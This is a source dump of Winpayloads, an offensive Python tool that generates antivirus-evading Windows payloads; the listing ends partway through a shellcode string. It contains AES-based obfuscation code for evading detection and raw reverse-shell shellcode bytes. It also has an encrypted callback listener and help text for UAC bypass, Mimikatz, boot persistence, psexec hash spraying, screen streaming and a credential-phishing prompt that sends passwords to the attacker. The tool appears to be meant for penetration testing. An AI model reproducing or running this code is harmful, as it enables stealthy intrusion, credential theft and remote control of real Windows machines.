├── .gitignore ├── LICENCE ├── README.md ├── WinPayloads.py ├── lib ├── __init__.py ├── encrypt.py ├── generatepayload.py ├── help.py ├── listener.py ├── main.py ├── menu.py ├── payloadextras.py ├── powershell │ └── stager.ps1 ├── preparepayload.py ├── psexec.py ├── stager.py └── startmetasploit.py └── setup.sh /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | /lib/psexecspray.py 3 | server.crt 4 | server.key 5 | /lib/sockets.py 6 | -------------------------------------------------------------------------------- /LICENCE: -------------------------------------------------------------------------------- 1 | Apache License 2 | 3 | Version 2.0, January 2004 4 | 5 | http://www.apache.org/licenses/ 6 | 7 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 8 | 9 | 1. Definitions. 10 | 11 | "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. 16 | 17 | "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. 18 | 19 | "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. 20 | 21 | "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. 22 | 23 | "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). 24 | 25 | "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. 26 | 27 | "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." 28 | 29 | "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 30 | 31 | 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 32 | 33 | 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 34 | 35 | 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: 36 | 37 | You must give any other recipients of the Work or Derivative Works a copy of this License; and 38 | You must cause any modified files to carry prominent notices stating that You changed the files; and 39 | You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and 40 | If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. 41 | 42 | You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 43 | 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 44 | 45 | 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 46 | 47 | 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 48 | 49 | 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 50 | 51 | 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. 52 | 53 | END OF TERMS AND CONDITIONS 54 | 55 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Winpayloads - Python2.7 2 | Undetectable Windows Payload Generation with extras Running on Python2.7 3 | 4 | ## As usual, Don't upload payloads to any online virus checkers 5 | - Virus Total Detection - Updated 30/9/2016 - Detected by 8 AV 6 | https://www.virustotal.com/en/file/23a24f99c3c6c00cd4bf6cb968f813ba2ceadfa846c7f169f412bcbb71ba6573/analysis/1475232549/ 7 | 8 | ## For Fully Undetectable Payloads please use the stager functionality [Youtube Video](https://youtu.be/eRl5H5wHqKY) 9 | 10 | 11 | 12 | ## Features 13 | * UACBypass - PowerShellEmpire https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/privesc/Invoke-BypassUAC.ps1 Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved. 14 | * PowerUp - PowerShellEmpire https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved. 15 | * Invoke-Shellcode https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 Copyright (c) 2012, Matthew Graeber. All rights reserved. 16 | * Invoke-Mimikatz https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1 Copyright (c) 2012, Matthew Graeber. All rights reserved. 17 | * Invoke-EventVwrBypass https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Matt Nelson (@enigma0x3) 18 | * Persistence - Adds payload persistence on reboot 19 | * Psexec Spray - Spray hashes until successful connection and psexec payload on target 20 | * Upload to local webserver - Easy deployment 21 | * Powershell stager - allows invoking payloads in memory & more 22 | 23 | ## Check out the Wiki for installation and more! 24 | https://github.com/nccgroup/Winpayloads/wiki 25 | 26 | ![alt tag](https://raw.githubusercontent.com/Charliedean/charliedean.github.io/master/images/2016-02-16%2010_12_29-Kali2%20-%20VMware%20Workstation.png) 27 | 28 | # Video and Information on Blog (OUTDATED) 29 | https://charliedean.github.io 30 | -------------------------------------------------------------------------------- /WinPayloads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from lib.main import * 3 | from lib.payloadextras import * 4 | from lib.startmetasploit import * 5 | from lib.menu import * 6 | 7 | try: 8 | from lib.psexecspray import * 9 | except: 10 | print t.bold_red + "[!] Rerun the setup.sh" + t.normal 11 | 12 | if not re.search('winpayloads', os.getcwd().lower()): 13 | print t.bold_red + "[!!] Please Run From Winpayloads Dir" + t.normal 14 | sys.exit(1) 15 | 16 | DIR = os.path.expanduser('~') + '/winpayloads' 17 | if not os.path.isdir(DIR): 18 | os.mkdir(DIR) 19 | 20 | 21 | try: 22 | print t.bold_green + "Checking if up-to-date || ctr + c to cancel" + t.normal 23 | checkupdate = subprocess.Popen(['git','pull','--dry-run'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 24 | LOADING = Spinner('Checking...') 25 | while checkupdate.poll() == None: 26 | LOADING.Update() 27 | time.sleep(0.2) 28 | print '\r', 29 | sys.stdout.flush() 30 | if checkupdate.stderr.read(): 31 | updateornah = raw_input(t.bold_red + "Do you want to update WinPayloads? y/[n]: " + t.normal) 32 | if updateornah.lower() == "y": 33 | p = subprocess.Popen(['git','pull']) 34 | p.wait() 35 | print t.bold_yellow + "Re-run setup.sh and reload Winpayloads..." + t.normal 36 | sys.exit() 37 | except KeyboardInterrupt: 38 | pass 39 | 40 | from lib.listener import StartAsync 41 | async = StartAsync() 42 | async.start() 43 | 44 | try: 45 | getAndRunMainMenu() 46 | except KeyboardInterrupt: 47 | print t.bold_green + '\n[*] Cleaning Up\n' + t.normal 48 | subprocess.call(['rm *.rc'], shell=True, 49 | stdout=subprocess.PIPE, stderr=subprocess.PIPE) 50 | subprocess.call(['rm *.ps1'], shell=True, 51 | stdout=subprocess.PIPE, stderr=subprocess.PIPE) 52 | subprocess.call(['rm logdict*'], shell=True, 53 | stdout=subprocess.PIPE, stderr=subprocess.PIPE) 54 | sys.exit() 55 | -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/secretsquirrel/Winpayloads/d63d660826e7f4358e3845876fb730c66dd5345c/lib/__init__.py -------------------------------------------------------------------------------- /lib/encrypt.py: -------------------------------------------------------------------------------- 1 | import Crypto.Cipher.AES as AES 2 | import os 3 | import random 4 | import string 5 | 6 | def randomVar(): 7 | return ''.join(random.sample(string.ascii_lowercase, 8)) 8 | 9 | def randomJunk(): 10 | newString = '' 11 | for i in xrange(random.randint(1, 10)): 12 | newString += ''.join(random.sample(string.ascii_lowercase, random.randint(1, 26))) 13 | return newString 14 | 15 | def do_Encryption(payload): 16 | counter = os.urandom(16) 17 | key = os.urandom(32) 18 | 19 | randkey = randomVar() 20 | randcounter = randomVar() 21 | randcipher = randomVar() 22 | 23 | randdecrypt = randomJunk() 24 | randshellcode = randomJunk() 25 | 26 | randctypes = randomJunk() 27 | randaes = randomJunk() 28 | 29 | encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) 30 | encrypted = encrypto.encrypt(payload.replace('ctypes',randctypes).replace('shellcode',randshellcode)) 31 | 32 | newpayload = "# -*- coding: utf-8 -*- \n" 33 | newpayload += "%s = '%s'\n"% (randomVar(), randomJunk()) 34 | newpayload += "import Crypto.Cipher.AES as %s \nimport ctypes as %s \n" %(randaes, randctypes) 35 | newpayload += "%s = '%s'.decode('hex') \n" % (randkey, key.encode('hex')) 36 | newpayload += "%s = '%s'.decode('hex') \n" % (randcounter, counter.encode('hex')) 37 | newpayload += "%s = '%s'\n"% (randomVar(), randomJunk()) 38 | newpayload += "%s = %s.new(%s , %s.MODE_CTR, counter=lambda: %s )\n" % (randdecrypt, randaes, randkey, randaes, randcounter) 39 | newpayload += "%s = %s.decrypt('%s'.decode('hex')) \n" % (randcipher, randdecrypt, encrypted.encode('hex')) 40 | newpayload += "exec(%s)" % randcipher 41 | return newpayload 42 | -------------------------------------------------------------------------------- /lib/generatepayload.py: -------------------------------------------------------------------------------- 1 | from main import * 2 | from payloadextras import * 3 | from psexecspray import * 4 | from startmetasploit import * 5 | from generatepayload import * 6 | from menu import * 7 | from encrypt import * 8 | from stager import * 9 | 10 | 11 | METASPLOIT_Functions = { 12 | 'reverse': { 13 | 'uacbypass': METASPLOIT().metrev_uac, 14 | 'allchecks': METASPLOIT().metrev_allchecks, 15 | 'persistence': METASPLOIT().metrev_persistence, 16 | 'normal': METASPLOIT().metrev_normal 17 | }, 18 | 'bind': { 19 | 'uacbypass': METASPLOIT().metbind_uac, 20 | 'allchecks': METASPLOIT().metbind_allchecks, 21 | 'persistence': METASPLOIT().metbind_persistence, 22 | 'normal': METASPLOIT().metbind_normal 23 | }, 24 | 'https': { 25 | 'uacbypass': METASPLOIT().methttps_uac, 26 | 'allchecks': METASPLOIT().methttps_allchecks, 27 | 'persistence': METASPLOIT().methttps_persistence, 28 | 'normal': METASPLOIT().methttps_normal 29 | }, 30 | 'dns': { 31 | 'uacbypass': METASPLOIT().metdns_uac, 32 | 'allchecks': METASPLOIT().metdns_allchecks, 33 | 'persistence': METASPLOIT().metdns_persistence, 34 | 'normal': METASPLOIT().metdns_normal 35 | }, 36 | 'nclistener': { 37 | 'nclisten': METASPLOIT().nclisterner, 38 | } 39 | } 40 | def askAndReturnModules(shellcode, metasploit_type): 41 | if metasploit_type == 'nclistener': 42 | return (EXTRAS(shellcode).RETURN_EZ2READ_SHELLCODE(), METASPLOIT_Functions[metasploit_type]['nclisten']) 43 | else: 44 | want_UACBYPASS = raw_input(t.bold_red + '[*] Try UAC Bypass(Only Works For Local Admin Account)?' + t.bold_red + ' y/[n]:' + t.normal) 45 | if want_UACBYPASS.lower() == 'y': 46 | win7orwin10 = raw_input(t.bold_red + '[*] Windows 7 or 10?' + t.bold_red + ' 7/[10]:' + t.normal) 47 | if not win7orwin10: 48 | win7orwin10 = "10" 49 | return (EXTRAS(shellcode).UACBYPASS(win7orwin10), METASPLOIT_Functions[metasploit_type]['uacbypass']) 50 | 51 | want_ALLCHECKS = raw_input(t.bold_red + '[*] Invoke Priv Esc Checks? y/[n]:' + t.normal) 52 | if want_ALLCHECKS.lower() == 'y': 53 | return (EXTRAS(shellcode).ALLCHECKS(), METASPLOIT_Functions[metasploit_type]['allchecks']) 54 | 55 | want_PERSISTENCE = raw_input(t.bold_red + '[*] Persistent Payload on Boot? y/[n]:' + t.normal) 56 | if want_PERSISTENCE.lower() == 'y': 57 | return (EXTRAS(shellcode).PERSISTENCE(), METASPLOIT_Functions[metasploit_type]['persistence']) 58 | 59 | return (EXTRAS(shellcode).RETURN_EZ2READ_SHELLCODE(), METASPLOIT_Functions[metasploit_type]['normal']) 60 | 61 | def GeneratePayload(ez2read_shellcode,payloadname,shellcode): 62 | with open('%s/payload.py' % payloaddir(), 'w+') as Filesave: 63 | Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode))) 64 | Filesave.close() 65 | print '[*] Creating Payload using Pyinstaller...' 66 | 67 | randomenckey = ''.join(random.sample(string.ascii_lowercase, 16)) 68 | 69 | p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py', 70 | '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 71 | LOADING = Spinner('Generating Payload') 72 | while p.poll() == None: 73 | LOADING.Update() 74 | time.sleep(0.2) 75 | print '\r', 76 | sys.stdout.flush() 77 | 78 | payloadstderr = p.stderr.read() 79 | if len(sys.argv) > 1: 80 | if sys.argv[1] == "-debug": 81 | sys.stdout.write(payloadstderr) 82 | os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname)) 83 | print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal 84 | CleanUpPayloadMess(payloadname) 85 | from menu import clientMenuOptions 86 | if len(clientMenuOptions.keys()) > 2: 87 | DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True) 88 | else: 89 | DoPayloadUpload(payloadname) 90 | 91 | 92 | def CleanUpPayloadMess(payloadname): 93 | os.system('rm dist -r') 94 | os.system('rm build -r') 95 | os.system('rm *.spec') 96 | os.system('rm %s/payload.py' % payloaddir()) 97 | 98 | def DoPayloadUpload(payloadname): 99 | want_to_upload = raw_input( 100 | '\n[*] Upload To Local Websever or (p)sexec? [y]/p/n: ') 101 | if want_to_upload.lower() == 'p' or want_to_upload.lower() == 'psexec': 102 | DoPsexecSpray(payloaddir() + '/' + payloadname + '.exe') 103 | elif want_to_upload.lower() == 'y' or want_to_upload.lower() == '': 104 | FUNCTIONS().DoServe(FUNCTIONS().CheckInternet(), payloadname, payloaddir(), port=8000, printIt = True) 105 | 106 | def DoClientUpload(payloaddir,payloadname,powershellExec,isExe): 107 | use_client_upload = raw_input( 108 | '\n[*] Upload Using Client Connection? [y]/n: ') 109 | if use_client_upload.lower() == 'y' or use_client_upload == '': 110 | from menu import clientMenuOptions 111 | for i in clientMenuOptions.keys(): 112 | if i == 'back' or i == 'r': 113 | pass 114 | else: 115 | print t.bold_yellow + i +t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.normal + '\n' 116 | while True: 117 | clientchoice = raw_input('>> ') 118 | try: 119 | clientnumber = clientMenuOptions[clientchoice]['params'] 120 | break 121 | except: 122 | continue 123 | clientUpload((payloaddir + '/' + payloadname),clientnumber,powershellExec,isExe) 124 | print "Allow 20 seconds..." 125 | return clientnumber 126 | -------------------------------------------------------------------------------- /lib/help.py: -------------------------------------------------------------------------------- 1 | from main import * 2 | 3 | print_payloads =( 4 | """ 5 | + Windows Reverse Shell 6 | - This payload will give the attacker a stageless reverse tcp shell 7 | - A listener will be automatically started using NetCat 8 | 9 | + Windows Reverse Meterpreter 10 | - This payload will give the attacker a staged reverse tcp meterpreter shell 11 | - A listener will be automatically started using Metasploit 12 | - All MODULES are avalible for this payload 13 | 14 | + Windows Bind Meterpreter 15 | - This payload will give the attacker a staged bind tcp meterpreter shell 16 | - Connection to the bind port will be automatically started using Metasploit 17 | - All MODULES are avalible for this payload 18 | 19 | + Windows Reverse Meterpreter HTTPS 20 | - This payload will give the attacker a staged reverse HTTPS meterpreter shell 21 | - A listener will be automatically started using Metasploit 22 | - All MODULES are avalible for this payload 23 | 24 | + Windows Reverse Meterpreter DNS 25 | - This payload will give the attacker a staged reverse tcp meterpreter shell with DNS name resolution 26 | - Good for dynamic ip addresses and persistence payloads 27 | - A listener will be automatically started using Metasploit 28 | - All MODULES are avalible for this payload 29 | """) 30 | print_modules =( 31 | """ 32 | + UAC Bypass 33 | - This Module only works on Local Administrator Accounts 34 | - Using this module, PowerShellEmpire's UAC Bypass will execute on the target 35 | - This will bypass uac and create another session running as administrator 36 | - https://github.com/PowerShellEmpire/Empire 37 | 38 | + Priv Esc checks 39 | - Using this module, PowerShellEmpire's PowerUp AllChecks will execute on the target 40 | - This will find common privesc vulnerabilities on the target 41 | - https://github.com/PowerShellEmpire/Empire 42 | 43 | + Persistence 44 | - This module will run a powershell script on the target 45 | - Persistence adds registry keys and to the startup folder to automatically run the payload everytime the target boots 46 | """) 47 | print_deployment =( 48 | """ 49 | + SimpleHTTPServer 50 | - The payload will be hosted locally on a HTTP server 51 | 52 | + Psexec and Spraying 53 | - Spray hashes to find a vulnerable target 54 | - Psexec the payload to the target 55 | - Runs as system 56 | """) 57 | 58 | print_ps_menu =( 59 | """ 60 | + Powershell Menu 61 | - Powershell payloads that are executed by Powershell 62 | 63 | + Reverse Powershell shell 64 | - Reverse powershell shell over tcp 65 | 66 | + Reverse Watch Screen 67 | - Streams the targets primary screen to your local machine over tcp 68 | 69 | + Ask creds 70 | - Keeps asking the target for their username and password until the correct credentials are entered. 71 | - Credentials are then sent over tcp 72 | """) 73 | 74 | print_stager =( 75 | """ 76 | + Stager 77 | - Listener starts on port 5555 when starting winpayloads 78 | - Using the stager main menu item will print the encoded powershell stager command 79 | - This can then be used in a bat file or executed directly into a cmd prompt 80 | - A secure encrypted socket connection will be made back to winpayloads 81 | - Using the clients menu, you can interact will all the clients and drop into a shell 82 | - When a client has an active connection, all payloads can be executed on the target through the connection 83 | - Payloads will be invoked without touching disk and powershell payloads will be executed through the shell 84 | - Multiple payloads can be used while the client is connected 85 | """) 86 | 87 | def winpayloads_help(): 88 | print "\n|=------=|" 89 | print "|" + t.bold_green + "PAYLOADS" + t.normal + "|" 90 | print "|=------=|" 91 | print print_modules 92 | print "\n|=-----=|" 93 | print "|" + t.bold_green + "MODULES" + t.normal + "|" 94 | print "|=-----=|" 95 | print print_payloads 96 | print "\n|=--------=|" 97 | print "|" + t.bold_green + "DEPLOYMENT" + t.normal + "|" 98 | print "|=--------=|" 99 | print print_deployment 100 | print "\n|=--------=|" 101 | print "|" + t.bold_green + " PS MENU " + t.normal + "|" 102 | print "|=--------=|" 103 | print print_ps_menu 104 | print "\n|=--------=|" 105 | print "|" + t.bold_green + " STAGER " + t.normal + "|" 106 | print "|=--------=|" 107 | print print_stager 108 | return "pass" 109 | -------------------------------------------------------------------------------- /lib/listener.py: -------------------------------------------------------------------------------- 1 | from stager import * 2 | import threading 3 | 4 | amap = {} 5 | 6 | class StartAsync(threading.Thread): 7 | def __init__(self, map=amap): 8 | threading.Thread.__init__(self) 9 | self.setDaemon(True) 10 | self.map = amap 11 | self.started = False 12 | 13 | def run(self): 14 | while True: 15 | if self.started: 16 | asyncore.loop(timeout=0.5, map=self.map) 17 | self.started = False 18 | else: 19 | while not self.map: 20 | time.sleep(0.5) 21 | self.started = True 22 | 23 | 24 | class Handler(asyncore.dispatcher): 25 | def __init__(self, clientconn, server, map): 26 | asyncore.dispatcher.__init__(self, sock=clientconn, map=amap) 27 | self.server = server 28 | self.in_buffer = [] 29 | self.out_buffer = [] 30 | self.user_name = '' 31 | self.is_admin = '' 32 | return 33 | 34 | def handle_close(self): 35 | print t.bold_red + "Client %s Connection Killed"% self.server.get_clientnumber() + t.normal 36 | self.close() 37 | 38 | def readable(self): 39 | return True 40 | 41 | def handle_read(self): 42 | data = self.recv(8000) 43 | if data: 44 | if data: 45 | self.in_buffer.append(data) 46 | if '[#check#]' in data: 47 | self.user_name = "User:" + data.split(':')[0].replace('\x00','').replace('[#check#]','') 48 | self.is_admin = "Admin:" + data.split(':')[1].replace('\x00','').replace('[#check#]','') 49 | from menu import clientMenuOptions 50 | clientMenuOptions[self.server.get_clientnumber()] = {'payloadchoice': None, 'payload':str(self.getpeername()[0]) + ":" + str(self.getpeername()[1]), 'extrawork': interactShell, 'params': (self.server.get_clientnumber()), 'availablemodules':{self.user_name: '', self.is_admin: ''}} 51 | self.in_buffer = [] 52 | 53 | def writable(self): 54 | return len(self.out_buffer) > 0 55 | 56 | def handle_write(self): 57 | sent = self.send(self.out_buffer.pop()) 58 | 59 | class Server(asyncore.dispatcher): 60 | want_read = want_write = True 61 | def __init__(self, host, port, bindsocket=False, relay=False, map=amap): 62 | asyncore.dispatcher.__init__(self, map=amap) 63 | self.create_socket(socket.AF_INET, socket.SOCK_STREAM) 64 | self.set_reuse_addr() 65 | self.handlers = {} 66 | self.clientnumber = 0 67 | self.bindsocket = bindsocket 68 | self.relay = relay 69 | self.map = amap 70 | 71 | if self.bindsocket: 72 | self.bind((host, port)) 73 | self.listen(30) 74 | elif self.relay: 75 | self.bind((host, port)) 76 | self.listen(1) 77 | else: 78 | self.connect((host, port)) 79 | 80 | 81 | def writable(self): 82 | return self.want_write 83 | 84 | def readable(self): 85 | return self.want_read 86 | 87 | def handle_connect(self): 88 | self.socket = ssl.wrap_socket(self.socket, ssl_version=ssl.PROTOCOL_TLSv1, ciphers='AES256', do_handshake_on_connect=False) 89 | print '[*] Connection to %s:%s'%(self.socket.getpeername()) 90 | 91 | def _handshake(self): 92 | try: 93 | self.socket.do_handshake() 94 | except ssl.SSLError, err: 95 | self.want_read = self.want_write = False 96 | if err.args[0] == ssl.SSL_ERROR_WANT_READ: 97 | self.want_read = True 98 | elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE: 99 | self.want_write = True 100 | else: 101 | raise 102 | else: 103 | self.clientnumber += 1 104 | handler = Handler(self.socket, self, map=self.map) 105 | self.handlers[self.clientnumber] = handler 106 | 107 | def handle_accept(self): 108 | if self.bindsocket: 109 | self.socket = ssl.wrap_socket(self.socket, ssl_version=ssl.PROTOCOL_TLSv1, ciphers='AES256', server_side=True, certfile='server.crt', keyfile='server.key') 110 | clientconn, address = self.accept() 111 | if clientconn: 112 | print '[*] Connection from %s:%s'%(address) 113 | self.clientnumber += 1 114 | handler = Handler(clientconn, self, map=self.map) 115 | self.handlers[self.clientnumber] = handler 116 | 117 | 118 | def get_clientnumber(self): 119 | return str(self.clientnumber) 120 | 121 | handle_read = handle_write = _handshake 122 | -------------------------------------------------------------------------------- /lib/main.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import socket 4 | import re 5 | import subprocess 6 | import struct 7 | import sys 8 | import blessed 9 | import random 10 | import SimpleHTTPServer 11 | import SocketServer 12 | import multiprocessing 13 | from Crypto.Cipher import AES 14 | import base64 15 | import string 16 | import glob 17 | import readline 18 | import time 19 | import psexec 20 | import urllib2 21 | from collections import OrderedDict 22 | import string 23 | import asyncore 24 | import ssl 25 | import threading 26 | import prompt_toolkit 27 | 28 | t = blessed.Terminal() 29 | 30 | def payloaddir(): 31 | return os.path.expanduser('~') + '/winpayloads' 32 | 33 | class HANDLER(SimpleHTTPServer.SimpleHTTPRequestHandler): #patching httpserver to shutup 34 | def log_message(self, format, *args): 35 | return 36 | 37 | 38 | class SHELLCODE(object): 39 | 40 | windows_rev_shell = ( 41 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" 42 | "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" 43 | "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" 44 | "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" 45 | "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" 46 | "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" 47 | "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" 48 | "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" 49 | "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" 50 | "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" 51 | "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" 52 | "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" 53 | "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" 54 | "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" 55 | "\xdf\xe0\xff\xd5\x97\x6a\x05\x68%s\x68" #ip 56 | "\x02\x00%s\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" 57 | "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" 58 | "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" 59 | "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" 60 | "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" 61 | "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" 62 | "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" 63 | "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" 64 | "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" 65 | "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") 66 | 67 | windows_met_rev_shell = ( 68 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" 69 | "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" 70 | "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" 71 | "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" 72 | "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" 73 | "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" 74 | "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" 75 | 